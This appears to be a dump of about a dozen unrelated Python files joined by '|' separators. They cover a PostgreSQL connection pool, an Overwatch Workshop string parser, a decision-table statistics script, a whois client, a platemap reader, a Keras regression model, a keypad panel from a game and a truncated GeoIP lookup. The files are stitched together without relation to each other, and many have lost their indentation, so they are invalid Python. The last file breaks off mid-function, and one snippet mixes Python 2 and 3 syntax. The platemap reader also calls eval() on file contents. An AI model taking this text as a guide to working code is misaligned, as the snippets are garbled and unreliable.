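    map_points = load_map("map.msg")
    trajectory = load_poses("poses.txt", to_camera_coord=False)
    culled = cull_map(map_points, ceiling=2.0, floor=-0.5)
    print(len(culled), "map points kept,", len(trajectory), "poses loaded")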
|
from contextlib import contextmanager
from urllib.parse import urlparse
import psycopg2
import psycopg2.extras
from psycopg2.pool import ThreadedConnectionPool
POOL = None
def setup(url):
global POOL
u = urlparse(url)
POOL = ThreadedConnectionPool(1, 20,
database=u.path[1:],
user=u.username,
password=u.password,
host=u.hostname,
port=u.port)
# initialize DB schema
with open('./db/schema.sql', 'r') as f:
schema = f.read()
with cursor(True) as cur:
cur.execute(schema)
@contextmanager
def cursor(commit=False):
global POOL
assert POOL is not None, 'use db.setup() before calling db.cursor()'
connection = None
try:
connection = POOL.getconn()
cur = connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
try:
yield cur
if commit:
connection.commit()
finally:
cur.close()
finally:
POOL.putconn(connection)
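# --- Usage sketch (illustrative only) ---
# Assumes a reachable PostgreSQL instance and the ./db/schema.sql file read by
# setup(); the connection URL below is a placeholder, not a real credential.
if __name__ == "__main__":
    setup("postgres://user:password@localhost:5432/mydb")
    with cursor() as cur:
        cur.execute("SELECT 1 AS ok")
        print(cur.fetchone())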
|
#String Building algorithm for the Overwatch Workshop
#
#Heavily inspired by Deltins ParseString algorithm
#https://github.com/ItsDeltin/Overwatch-Script-To-Workshop/blob/91f6d89cae2dda77d40139a589c22077def7654f/Deltinteger/Deltinteger/Elements/Values.cs#L729
#Parts copied are used with permission.
import logging
import re
class StringParser():
SYMBOLS = "-></*-+=()!?"
PARAM_REPLACE_RE = re.compile("(\\\\{[0-9]+?\\\\})")
PARAM_MATCH_RE = re.compile("^\\{([0-9]+?)\\}")
PARAM_ONLY_RE = re.compile("^\\{([0-9]+?)\\}$")
logger = logging.getLogger("OS.StringParser")
def __init__(self, db_file="res/strings.txt"):
self.words = []
self.us_words = []
if db_file:
self.loadWords(db_file)
def loadWords(self, path):
"""
Load words from a file.
"""
with open(path, "r") as f:
for line in f.readlines():
if line.startswith("//"):
continue
self.words.append(line.strip("\n").lower())
self.sort()
def sort(self):
"""
Sort the internal list of words after
certain criteria.
"""
#Right so I don't have fancy incremental sorting like C# does.
#What I *can* do is split the list into multiple lists, then merge
#TODO: temporary fix
for i in self.words:
if "_" in i:
j = i.replace("_", " ")
self.us_words.append((i, j))
hasParam = []
for i in self.words[:]:
if "{0}" in i:
hasParam.append(i)
self.words.remove(i)
hasParamAndSymbol = []
for i in hasParam[:]:
for char in self.SYMBOLS:
if char in i:
hasParamAndSymbol.append(i)
hasParam.remove(i)
break
hasSymbol = []
for i in self.words[:]:
for char in self.SYMBOLS:
if char in i:
hasSymbol.append(i)
self.words.remove(i)
break
#Sorting key function
def f(x):
return len(x)
hasParam.sort(key=f)
hasParamAndSymbol.sort(key=f)
hasSymbol.sort(key=f)
self.words.sort(key=f)
self.words.extend(hasSymbol)
self.words.extend(hasParam)
self.words.extend(hasParamAndSymbol)
self.words.reverse()
def parse(self, s, params, depth=0):
"""
Parse a string into a value understood by OWW.
s should be an instance of str.
You can specify parameters inside your string using
the {n} syntax. Parameters will be substituted in order
        of occurrence.
If s contains words or phrases not recognized by the parser,
ValueError is raised.
If params contains more items than s has parameters, the remaining
items are silently dropped.
        If params contains fewer items than s has parameters, TypeError is raised.
The returned value will be a string consisting of one or multiple calls
to the String() OWW function.
"""
final_string = ""
#TODO: temporary fix
if not depth:
for template, phrase in self.us_words:
s = s.replace(phrase, template)
#special case for when the string passed to the parse() method
#is literally just "{n}"
m = self.PARAM_ONLY_RE.fullmatch(s)
if m is not None:
return params[int(m.group(1))]
for template in self.words:
temp_re = "^%s$" % re.sub(self.PARAM_REPLACE_RE, "(.+)", re.escape(template))
self.logger.debug("Testing string template '%s' (-> RE template '%s')..." % (template, temp_re))
match = re.match(temp_re, s)
if match is not None:
try:
self.logger.debug("Match found: %s" % template)
#TODO: Temporary fix
#string_args = ['"%s"' % template]
string_args = ['"%s"' % template.replace("_", " ")]
#check parameters
for group in match.groups():
#is parameter formatted?
self.logger.debug("Parsing group '%s'..." % group)
paramStr = re.fullmatch(self.PARAM_MATCH_RE, group)
if paramStr:
#substitute parameter
try:
string_args.append(params[int(paramStr.group(1))])
except IndexError:
raise TypeError("Not enough arguments to format string.")
else:
#keep parsing
string_args.append(self.parse(group, params))
string_args.extend(["null"] * (4 - len(string_args)))
final_string += "String(%s)" % ", ".join(string_args)
break
except ValueError as e:
self.logger.debug("%s. Trying next template..." % str(e))
continue
else:
raise ValueError("Can't match string '%s': No matching template found." % s)
return final_string
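# --- Usage sketch (illustrative only) ---
# Whether a phrase can be parsed depends entirely on the templates shipped in
# res/strings.txt, so the example phrase below is an assumption and the call is
# guarded against ValueError.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    parser = StringParser()
    try:
        print(parser.parse("hello {0}", ["Event Player"]))
    except ValueError as error:
        print("No matching template:", error)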
|
import math
import re
from KlasaDecyzyjna import KlasaDecyzyjna
def unique(list1):
unique_list = []
for x in list1:
if x not in unique_list:
unique_list.append(x)
return unique_list
class SystemDecyzyjny:
NUMBER_OF_ATTRIBUTES = 15
def printFile(self):
f = open(self)
print(f.read())
def getNumericAttributes(self):
i = 0
array = []
for elem in self:
if "n" in elem:
array.append(i)
i += 1
return array
def minAttributeValue(self, numericAttributes):
for i in numericAttributes:
array = []
for x in range(len(self)):
array.append(self[x][i])
print("attribute", i, "min value", min(array))
def maxAttributeValue(self, numericAttributes):
for i in numericAttributes:
array = []
for x in range(len(self)):
array.append(self[x][i])
print("attribute", i, "max value", max(array))
def separateClasses(self):
result = []
for i in self:
result.append(i[0:3])
return result
def sortAttrToSpecifiedClass(listOfClasses, listOfAttributes):
result = []
listIteration = 0
for i in listOfClasses:
x = KlasaDecyzyjna()
x.setKlasaDecyzyjna(i)
attributes = SystemDecyzyjny.switchColumnsToRows(listOfAttributes)
x.setAttributes(attributes[listIteration])
listIteration += 1
result.append(x)
return result
def switchColumnsToRows(self):
result = []
for x in range(len(self[0])):
row = []
for i in range(len(self)):
row.append(self[i][x])
result.append(row)
return result
def average(self):
sum = 0
for i in self:
sum = sum + float(i)
return sum / len(self)
def numberOfAttributesInClass(classes, numeric):
for i in range(len(classes)):
print(KlasaDecyzyjna.getKlasaDecyzyjna(classes[i]), "has", len(KlasaDecyzyjna.getAttributes(classes[i])),
"attributes")
def standardDeviation(classes, numeric):
for i in numeric:
standDevList = KlasaDecyzyjna.getAttributes(classes[i])
standDevAvg = SystemDecyzyjny.average(standDevList)
sum = 0
for j in standDevList:
xi = float(j) - standDevAvg
xi2 = xi * xi
sum = sum + xi2
standDev = math.sqrt(sum / len(standDevList))
print(KlasaDecyzyjna.getKlasaDecyzyjna(classes[i]), "standard deviation:", standDev)
def splitIntoLines(self):
return re.split(r'\n', self)
def listAttributesAndTheirNumbers(self):
lines = SystemDecyzyjny.splitIntoLines(self)
myArray = []
for line in lines:
myArray.append(line.split(" "))
return myArray
def main():
SystemDecyzyjny.printFile("australian-type.txt")
array = SystemDecyzyjny.splitIntoLines(open("australian-type.txt").read())
print(array)
lines = SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read())
SystemDecyzyjny.minAttributeValue(lines, SystemDecyzyjny.getNumericAttributes(array))
SystemDecyzyjny.maxAttributeValue(lines, SystemDecyzyjny.getNumericAttributes(array))
SystemDecyzyjny.switchColumnsToRows(SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read()))
classes = SystemDecyzyjny.sortAttrToSpecifiedClass(SystemDecyzyjny.separateClasses(array),
SystemDecyzyjny.listAttributesAndTheirNumbers(
open("australian.txt").read()))
SystemDecyzyjny.numberOfAttributesInClass(classes, SystemDecyzyjny.switchColumnsToRows(
SystemDecyzyjny.listAttributesAndTheirNumbers(open("australian.txt").read())))
for elem in classes:
print("Różne wartości dla decyzji "+ elem.getKlasaDecyzyjna()+": ")
print(unique(elem.getAttributes()))
for elem in classes:
print("Wszystkie wartości dla decyzji "+ elem.getKlasaDecyzyjna()+": ")
print(*elem.getAttributes())
SystemDecyzyjny.standardDeviation(classes, SystemDecyzyjny.getNumericAttributes(array))
if __name__ == "__main__":
main()
|
import base64
import dash_html_components as html
def get_banner():
banner = html.Div(
id='app-page-header',
children=[
html.A(
id='dashbio-logo', children=[
html.Img(
src="./assets/MarianneLogo-3-90x57.png"
)],
href="https://www.etalab.gouv.fr/"
),
html.H2(["Data Gouv pour le Machine Learning (DGML)", html.Sup("β")],
style={"fontFamily": "Acumin"}),
html.A(
id='gh-link',
children=[
'Voir sur Github'
],
href="https://github.com/etalab-ia/dgml",
style={'color': 'black',
'border': 'solid 1px black'},
target="_blank"
),
html.Img(
src='data:image/png;base64,{}'.format(
base64.b64encode(
open('./assets/GitHub-Mark-64px.png', 'rb').read()
).decode()
)
)
],
)
return banner
|
from rs4 import asyncore
import socket
class WhoisRequest(asyncore.dispatcher_with_send):
# simple whois requestor
def __init__(self, consumer, query, host, port=43):
asyncore.dispatcher_with_send.__init__(self)
self.consumer = consumer
self.query = query
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((host, port))
def handle_connect(self):
self.send(self.query.encode ("utf8") + b"\r\n")
def handle_expt(self):
self.close() # connection failed, shutdown
self.consumer.abort()
def handle_read(self):
# get data from server
self.consumer.feed(self.recv(2048))
def handle_close(self):
self.close()
self.consumer.close()
class WhoisConsumer:
def __init__(self, host):
self.text = ""
self.host = host
def feed(self, text):
        # recv() hands us bytes; decode before appending to the str buffer
        self.text = self.text + text.decode("utf8", "ignore")
def abort(self):
print(self.host, "=>", "failed")
def close(self):
print(self.host, "=>")
print(self.text)
#
# try it out
for host in []:
consumer = WhoisConsumer(host)
request = WhoisRequest(consumer, host, "whois.internic.net")
# loop returns when all requests have been processed
asyncore.loop()
|
import numpy
import os
def readrcp(rcpfile):
# tab depth used for dictionary nesting
def getKeyDepth(key):
counter = (len(key) - len(key.lstrip())) / 4
return counter
f = open(rcpfile, "rU")
rcp = f.readlines()
f.close()
# make d[k, v] from lines of 'k: v', recurse function call if v is empty
def readKeys(rcplines, depth=0):
d = {}
for i, cline in enumerate(rcplines):
cdepth = getKeyDepth(cline)
if cdepth != depth:
                continue
else:
k = cline.split(":")[0].rstrip("\r\n")
try:
v = cline.split(": ")[1].lstrip().rstrip("\r\n")
except:
remaining_cdepths = [
l
for l, v in enumerate(
[getKeyDepth(line) for line in rcplines[i + 1 :]]
)
if v == cdepth
]
if len(remaining_cdepths) == 0:
v = readKeys(rcplines[i + 1 :], depth=cdepth + 1)
else:
v = readKeys(
rcplines[i + 1 : i + remaining_cdepths[0] + 1],
depth=cdepth + 1,
)
pass
d[k.lstrip()] = v
                if i == len(rcplines) - 1 or cdepth > getKeyDepth(rcplines[i + 1]):
return d
return d
return readKeys(rcp)
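# Illustrative input for readrcp (an assumption inferred from readKeys above):
# keys end with ":", scalar values follow ": ", and nesting is encoded by
# 4-space indentation, e.g.
#     experiment:
#         name: demo
#         params:
#             rate: 1.0
# would be parsed into
#     {'experiment': {'name': 'demo', 'params': {'rate': '1.0'}}}
# (values stay strings here; myeval below is what converts them elsewhere).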
def myeval(c):
if c == "None":
c = None
elif c == "nan" or c == "NaN":
c = numpy.nan
else:
temp = c.lstrip("0")
if (temp == "" or temp == ".") and "0" in c:
c = 0
else:
c = eval(temp)
return c
def readsingleplatemaptxt(p, returnfiducials=False, erroruifcn=None, lines=None):
if lines is None:
try:
f = open(p, mode="r")
except:
if erroruifcn is None:
return []
p = erroruifcn("bad platemap path")
if len(p) == 0:
return []
f = open(p, mode="r")
ls = f.readlines()
f.close()
else:
ls = lines
if returnfiducials:
s = ls[0].partition("=")[2].partition("mm")[0].strip()
if (
not "," in s[s.find("(") : s.find(")")]
): # needed because sometimes x,y in fiducials is comma delim and sometimes not
print("WARNING: commas inserted into fiducials line to adhere to format.")
print(s)
s = (
s.replace("( ", "( ")
.replace("( ", "( ")
.replace("( ", "(")
.replace(" )", " )")
.replace(", ", ",")
.replace(", ", ",")
.replace(" )", " )")
.replace(" )", ")")
.replace(" ", ",")
.replace(" ", ",")
.replace(" ", ",")
)
print(s)
fid = eval("[%s]" % s)
fid = numpy.array(fid)
for count, l in enumerate(ls):
if not l.startswith("%"):
break
keys = ls[count - 1][1:].split(",")
keys = [(k.partition("(")[0]).strip() for k in keys]
dlist = []
for l in ls[count:]:
sl = l.split(",")
d = dict([(k, myeval(s.strip())) for k, s in zip(keys, sl)])
dlist += [d]
if not "sample_no" in keys:
dlist = [dict(d, sample_no=d["Sample"]) for d in dlist]
if returnfiducials:
return dlist, fid
return dlist
|
import sys
from .board import GameBoard
def main(size, win):
game = GameBoard(size, win)
actions = {'l': game.shift_left,
'r': game.shift_right,
'u': game.shift_up,
'd': game.shift_down,
'undo': game.undo,
'exit': None}
stop = False
while not stop:
print_gameboard(game)
if game.won():
print('You won!')
stop = True
elif game.lost():
print('You lost. Try again.')
stop = True
else:
action = input_action(actions)
if not action:
stop = True
else:
action()
print()
def print_gameboard(gb: GameBoard):
print(f'..:: {gb.win} GAME ::..')
print(f'Score: {gb.get_score()}')
print(f'Moves: {gb.moves}')
print()
print('+'.join(['-'*6 for i in range(gb.size)]))
for row in gb.board:
items = []
for cell in row:
if cell == 0:
items.append(' '*6)
else:
items.append(f' {cell :<4} ')
print('|'.join(items))
print('+'.join(['-'*6 for i in range(gb.size)]))
print()
def input_action(actions):
while True:
user_input = input('Shift board (l/r/u/d) or do action (undo/exit): ')
user_input = user_input.strip().lower()
if user_input in actions.keys():
return actions[user_input]
else:
print('ERROR: Invalid action. Try again.')
|
# domain to company by hand
import json
import string
import clearbit
from pprint import pprint
with open('companies.json') as company_dump:
companies = json.load(company_dump)
# with open('baddata.txt') as baddata:
# dirtyComp = baddata.readlines()
# i =0
# for comp in dirtyComp:
# i=i+1
# if (i%3 ==0):
# print comp
commitCompany = {}
j=2
for key in companies:
print("what is this company?")
print key
company = raw_input()
# commitCompany[key] = dirtyComp[j]
j=j+3
pprint(commitCompany)
with open('companies2.json', 'w') as company_dump:
json.dump(commitCompany, company_dump)
# with open('companies2.json') as company_dump:
# check = json.load(company_dump)
# pprint(check)
|
import logging
import json
from PyQt5.QtCore import Qt, QAbstractTableModel, QVariant
class Model(QAbstractTableModel):
def __init__(self, parent):
QAbstractTableModel.__init__(self)
self.gui = parent
self.colLabels = ['Title', 'Video', 'Audio', 'Progress', 'URL']
self._data = []
# self._data = [
# ['Кухня 87', '140', '137', '0%', 'https://www.youtube.com/watch?v=G6bSu02Fmxo', [],],
# ['Кухня 92', '140', '137', '0%', 'https://www.youtube.com/watch?v=thazG-S8J-Q', [],],
# ['100 Years of Flight Attendant Uniforms', '160', '249', '0%', 'https://www.youtube.com/watch?v=1IEfCoGnTow', [],],
# ]
with open('yd.json', encoding='utf-8') as f:
data = json.load(f)
# print(json.dumps(data, indent=2))
# print(data["items"][0])
for el in data["items"]:
print(el["formats"])
print("\n\n")
self._data.append([el["title"], el["video"], el["audio"], '0%', el["url"], el["formats"],])
def save(self):
state = { 'items': self._data }
with open('yd-new.json', mode='w', encoding='utf-8') as f:
json.dump(state, f, indent=2)
def rowCount(self, parent):
return len(self._data)
def columnCount(self, parent):
return len(self.colLabels)
def data(self, index, role=Qt.DisplayRole):
if not index.isValid():
return QVariant()
elif role != Qt.DisplayRole and role != Qt.EditRole:
return QVariant()
value = ''
if role == Qt.DisplayRole:
row = index.row()
col = index.column()
value = self._data[row][col]
return QVariant(value)
def headerData(self, section, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return QVariant(self.colLabels[section])
return QVariant()
def addrow(self, row):
self._data.append(row)
def getRowByIdx(self, idx):
return self._data[idx]
def getFormatsByIdx(self, idx):
return self._data[idx][1] + "+" + self._data[idx][2]
def getListOfFormatsByIdx(self, idx):
return self._data[idx][5]
def getUrlByIdx(self, idx):
return self._data[idx][4]
def updateProgress(self, idx, value1, value2):
self._data[idx][3] = str(value1) + "+" + str(value2)
self.dataChanged.emit(self.createIndex(0, 0), self.createIndex(self.rowCount(0), self.columnCount(0)))
# logging.debug(self._data[idx])
|
'''
MobileHairNet models
'''
from .hairnet import MobileHairNet
|
import os
import time
import grpc
from formant.protos.agent.v1 import agent_pb2_grpc
from formant.protos.model.v1 import datapoint_pb2, file_pb2
path = os.path.dirname(os.path.realpath(__file__))
channel = grpc.insecure_channel("localhost:5501")
agent = agent_pb2_grpc.AgentStub(channel)
file_datapoint = file_pb2.File()
file_path = "%s/../../data/planets.csv" % path
file_datapoint.url = file_path
file_datapoint.filename = "planets.csv"
request = datapoint_pb2.Datapoint(
stream="test.file", file=file_datapoint, timestamp=int(time.time() * 1000)
)
agent.PostData(request)
|
from __future__ import annotations
from typing import List, Any, Dict, Optional, Type
from .base import IonSerializer
class IonBoolSerializer(IonSerializer):
"""
Serializes bool values as ``flagcontent``
"""
def __init__(self, name: str, data: bool, **kwargs) -> None:
super().__init__(name, **kwargs)
self.data = data
def serialize(self) -> Optional[Dict[str, Any]]:
result = super().serialize()
if result is None:
return None
result.update({
'type': 'flagcontent',
'is_enabled': self.data
})
return result
@classmethod
def supported_types(cls) -> List[Type]:
return [bool]
IonSerializer.register(IonBoolSerializer)
|
class Disjoint:
def __init__(self):
self.parent=None
self.rank=0
self.element=None
self.e=[]
class Set:
def __init__(self):
#self.repre=Disjoint()
self.repre=None
def makset(self,x,data):
self.repre=x
x.parent=x
x.rank=0
x.element=data
def findset1(self,x):
if x.parent==x:
return x
return self.findset1(x.parent)
def findset(self,x):
if x.parent==x:
return x
x.parent=self.findset(x.parent)
return x.parent
def Union(self,x,y):
rx=self.findset(x)
ry=self.findset(y)
if rx.rank>ry.rank:
ry.parent=rx
rx.e.append(ry.element)
elif rx.rank<ry.rank:
rx.parent=ry
ry.e.append(rx.element)
else:
ry.e.append(rx.element)
rx.parent=ry
ry.rank+=1
'''x=Disjoint()
x.element=1
y=Disjoint()
y.element=2
s=Set()
s.makset(x,1)
s.makset(y,2)
print((s.findset(x)).element)
s.Union(x,y)
print((s.findset(x)).element)
print((s.findset(y)).element)'''
print("Enter the total no of nodes:")
n=int(input())
print("Enter no of edges:")
e=int(input())
arr=[Disjoint() for i in range(n)]
s=Set()
for i in range(n):
s.makset(arr[i],i)
i=0
while i<e:
print("enter edges:")
x,y=map(int,input().split())
if x<n and y<n:
s.Union(arr[x],arr[y])
i+=1
else:
print("Invalid edge:")
i-=1
for i in range(n):
print(arr[i].rank)
|
from setuptools import setup, find_packages
setup(
name='pytorch_h5dataset',
version='0.2.4',
packages=find_packages(),
url='https://github.com/CeadeS/PyTorchH5Dataset',
license='BSD-3-Clause License',
author='Martin Hofmann',
author_email='Martin.Hofmann@tu-ilmenau.de',
description='Accelerated data loading H5 dataset module for PyTorch.',
install_requires=[
'numpy',
'h5py>=3.3.0',
'hdf5plugin',
'pandas',
'Pillow',
'tables',
'torch',
'scikit-image',
'torchvision',
'psutil',
'tqdm',
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
],
)
|
# mailstat.metric.counts
# Performs counting statistics of emails.
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: timestamp
#
# Copyright (C) 2013 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: counts.py [] benjamin@bengfort.com $
"""
Performs counting statistics of emails.
"""
##########################################################################
## Imports
##########################################################################
from mailstat.metric import Metric
##########################################################################
## Metrics
##########################################################################
class MostFrequentCorrespondents(Metric):
"""
Determines the top 10 most frequent communicators
"""
pass
|
from typing import Union
import numpy as np
import tensorflow.keras as keras
from numpy import ndarray
from pandas import DataFrame
from .model_helpers import make_tensorboard_callback, make_save_path
from ..utils import naming
class SimpleModel:
def __init__(self, directory_name: str, n_input: int, n_output: int):
self.directory_name = directory_name
self.model = keras.models.Sequential()
self.model.add(keras.layers.Dense(400, input_dim=n_input))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(800))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(400))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(300))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(200))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(100))
self.model.add(keras.layers.Activation('relu'))
self.model.add(keras.layers.Dense(n_output))
self.model.add(keras.layers.Activation('relu'))
self.model.summary()
adam_optimizer = keras.optimizers.Adam(lr=0.0005, beta_1=0.9, beta_2=0.999, epsilon=1e-8, decay=0,
amsgrad=False)
self.model.compile(loss='mean_squared_error', optimizer=adam_optimizer)
def train(self, input_train: ndarray, output_train: Union[DataFrame, ndarray], input_val: ndarray,
output_val: Union[DataFrame, ndarray], epochs=60):
*callbacks, time_stamp = self._setup_training()
output_train = np.array(output_train)
output_val = np.array(output_val)
hist = self.model.fit(input_train, output_train, validation_data=(input_val, output_val), epochs=epochs,
batch_size=256, verbose=1, callbacks=callbacks)
return hist, time_stamp
def train_with_generator(self, data_generator_train, data_generator_val, epochs=60):
*callbacks, time_stamp = self._setup_training()
hist = self.model.fit(data_generator_train, validation_data=data_generator_val, epochs=epochs, verbose=1,
callbacks=callbacks)
return hist, time_stamp
def _setup_training(self):
time_stamp = naming.make_timestamp()
tb_callback = make_tensorboard_callback(self.directory_name, time_stamp)
save_path = make_save_path(self.directory_name, time_stamp)
checkpoint = keras.callbacks.ModelCheckpoint(filepath=save_path, monitor='val_loss', verbose=1,
save_best_only=True)
lr_reduction = keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.5)
return tb_callback, checkpoint, lr_reduction, time_stamp
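# --- Usage sketch (illustrative only) ---
# Trains on random data purely to show the expected shapes; "demo_run" is a
# placeholder directory name and the run assumes the project's model_helpers
# and naming utilities are importable and can write their log/checkpoint paths.
if __name__ == "__main__":
    model = SimpleModel("demo_run", n_input=10, n_output=2)
    x = np.random.rand(128, 10)
    y = np.random.rand(128, 2)
    history, time_stamp = model.train(x[:96], y[:96], x[96:], y[96:], epochs=1)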
|
class Trampoline() :
called = False
def __init__(self, func) :
self.func = func
def __get__(self, obj, objtype) :
if not hasattr(self.func, '__self__') : self.func.__self__ = obj
return self.__call__
def __call__(self, *args, **kwargs) :
r = (self.func, [self.func.__self__, *args] if hasattr(self.func, '__self__') else args, kwargs)
if not Trampoline.called :
try :
Trampoline.called = True
while isinstance(r, tuple) and callable(r[0]) and isinstance(r[1], (tuple, list)) and isinstance(r[2], dict) :
(r, a, k) = r
if isinstance(r, Trampoline) : r = r.func
r = r(*a, **k)
except Exception : raise
finally : Trampoline.called = False
return r
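# --- Usage sketch (illustrative only) ---
# A tail-recursive function decorated with Trampoline: while the outermost call
# is running, inner "recursive" calls return (func, args, kwargs) tuples instead
# of growing the Python call stack, and the while-loop above unwinds them.
@Trampoline
def countdown_sum(n, acc=0):
    if n == 0:
        return acc
    return countdown_sum(n - 1, acc + n)
if __name__ == "__main__":
    print(countdown_sum(100000))  # 5000050000, without hitting the recursion limit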
|
for i in range(1,int(input())+1):
if i%2!=0:print(i)
|
from code.render.glfunctions import draw_rect, draw_rounded_rect
from code.constants.common import HACK_PANEL_WIDTH, HACK_PANEL_HEIGHT, SCREEN_WIDTH, SCREEN_HEIGHT, INPUT_SELECTION_LEFT, INPUT_SELECTION_RIGHT, INPUT_SELECTION_UP, INPUT_SELECTION_DOWN, INPUT_SELECTION_ACTIVATE, HACK_PANEL_TEMPORARY_STATUS_DURATION
from code.controllers.intervalcontroller import IntervalController
class HackPanel:
def __init__(self, passcode):
# The code to unlock the terminal
self.passcode = passcode
# Currently entered code
self.display = ""
# Current cursor location
self.cursor = 0
# Status message
self.status = "Awaiting input..."
# Temporary status message (e.g. on incorrect input)
self.temporary_status = ""
self.temporary_status_interval = 0
# Alpha control
self.alpha_controller = IntervalController(
interval = 0.0,
target = 1.0,
speed_in = 0.015,
speed_out = 0.035
)
# The buttons
self.buttons = (
(1, "1", 1), # value, label, width
(2, "2", 1),
(3, "3", 1),
(4, "4", 1),
(5, "5", 1),
(6, "6", 1),
(7, "7", 1),
(8, "8", 1),
(9, "9", 1),
(-1, "Back", 1),
(0, "0", 1),
(-2, "Exit", 1)
)
# Fading away?
def is_fading(self):
        return ( self.alpha_controller.get_target() == 0 )
# Faded away?
def is_gone(self):
return ( not self.alpha_controller.is_visible() )
def dismiss(self):
self.alpha_controller.dismiss()
def set_temporary_status(self, status):
self.temporary_status = status
self.temporary_status_interval = HACK_PANEL_TEMPORARY_STATUS_DURATION
def process(self, user_input, session):
# Process alpha
self.alpha_controller.process()
# Handle temporary status messages
if (self.temporary_status_interval > 0):
self.temporary_status_interval -= 1
if (self.temporary_status_interval <= 0):
self.temporary_status = ""
per_row = 3
# Check for user input
if (INPUT_SELECTION_LEFT in user_input):
if (self.cursor % per_row == 0):
self.cursor += (per_row - 1)
else:
self.cursor -= 1
if (self.cursor < 0):
self.cursor += (per_row + 1)
elif (INPUT_SELECTION_RIGHT in user_input):
if ( (self.cursor + 1) % per_row == 0):
self.cursor -= (per_row - 1)
else:
self.cursor += 1
if (self.cursor >= len(self.buttons)):
self.cursor -= per_row
elif (INPUT_SELECTION_UP in user_input):
self.cursor -= per_row
if (self.cursor < 0):
self.cursor += len(self.buttons)
elif (INPUT_SELECTION_DOWN in user_input):
self.cursor += per_row
if (self.cursor >= len(self.buttons)):
self.cursor -= len(self.buttons)
elif (INPUT_SELECTION_ACTIVATE in user_input):
# Append the value of the current selection
(value, title, width) = self.buttons[self.cursor]
if (value == -1):
if (len(self.display) > 0):
# Backspace
self.display = self.display[0 : len(self.display) - 1]
elif (value == -2):
session["core.login-succeeded"]["value"] = "no"
self.dismiss()
else:
self.display += "%d" % value
# Same length as passcode? Do check...
if (len(self.display) == len(self.passcode)):
if (self.display == self.passcode):
session["core.login-succeeded"]["value"] = "yes"
self.dismiss()
else:
self.display = ""
self.set_temporary_status("Unauthorized Access Attempt")
def render(self, text_renderer):
# Lightbox effect
draw_rect(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, (25, 25, 25, (self.alpha_controller.get_interval() / 1.5)))
(x, y) = (
int(SCREEN_WIDTH / 2) - int(HACK_PANEL_WIDTH / 2),
int(SCREEN_HEIGHT / 2) - int(HACK_PANEL_HEIGHT / 2)
)
# Elegant background
draw_rounded_rect(x, y, HACK_PANEL_WIDTH, HACK_PANEL_HEIGHT, (25, 25, 25, self.alpha_controller.get_interval()), (100, 50, 5, self.alpha_controller.get_interval()), border_size = 3)
# general padding
padding = 10
# render point
rx = padding
ry = padding * 2
# Render current entry status
text_renderer.render("Enter Code:", x + rx + 15, y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
draw_rounded_rect(x + rx + (HACK_PANEL_WIDTH / 2) - 15, y + ry, (HACK_PANEL_WIDTH / 2) - (2 * padding), text_renderer.font_height, (25, 25, 25, self.alpha_controller.get_interval()), (70, 20, 5, self.alpha_controller.get_interval()))
readout = self.display
while (len(readout) < len(self.passcode)):
readout += "?"
readout_x = (x + HACK_PANEL_WIDTH - padding - text_renderer.size(readout) - 15 - padding)
text_renderer.render(readout, readout_x, y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
text_renderer.render(self.display, readout_x, y + ry, (219, 183, 21, self.alpha_controller.get_interval()))
# Advance cursor double space
ry += 2 * text_renderer.font_height
# Render all buttons
per_row = 3
row_width = 0
button_width = int((HACK_PANEL_WIDTH - (2 * padding)) / 3)
for i in range(0, len(self.buttons)):
(value, title, width) = self.buttons[i]
if (i == self.cursor):
text_renderer.render(title, x + rx + int( (width * button_width) / 2) - int(text_renderer.size(title) / 2), y + ry, (219, 183, 21, self.alpha_controller.get_interval()))
# Faint white highlight
if (not self.is_fading()):
draw_rect(x + rx, y + ry, button_width, text_renderer.font_height, (225, 225, 225, 0.2))
else:
text_renderer.render(title, x + rx + int( (width * button_width) / 2) - int(text_renderer.size(title) / 2), y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
rx += (width * button_width)
row_width += width
if (row_width >= 3):
row_width = 0
rx = padding
ry += text_renderer.font_height + padding
# Double-space
ry += text_renderer.font_height
# Display status
if (self.temporary_status != ""):
text_renderer.render(self.temporary_status, x + int(HACK_PANEL_WIDTH / 2) - int(text_renderer.size(self.temporary_status) / 2), y + ry, (225, 25, 25, self.alpha_controller.get_interval()))
else:
text_renderer.render(self.status, x + int(HACK_PANEL_WIDTH / 2) - int(text_renderer.size(self.status) / 2), y + ry, (225, 225, 225, self.alpha_controller.get_interval()))
|
# -*- coding: utf-8 -*-
# @File : geoip.py
# @Date : 2021/2/25
# @Desc :
import os
import geoip2.database
from django.conf import settings
from Lib.log import logger
from Lib.xcache import Xcache
class Geoip(object):
def __init__(self):
pass
@staticmethod
def get_city(ip):
result = Xcache.get_city_reader_cache(ip)
if result is not None:
return result
city_mmdb_dir = os.path.join(settings.BASE_DIR, 'STATICFILES', 'STATIC', 'GeoLite2-City.mmdb')
city_reader = geoip2.database.Reader(city_mmdb_dir)
try:
response = city_reader.city(ip)
except Exception as _:
Xcache.set_city_reader_cache(ip, "局域网")
return "局域网"
country = ""
try:
country = response.country.name
country = response.country.names['zh-CN']
except Exception as E:
logger.exception(E)
if country is None:
country = ""
subdivision = ""
try:
subdivision = response.subdivisions.most_specific.name
subdivision = response.subdivisions.most_specific.names['zh-CN']
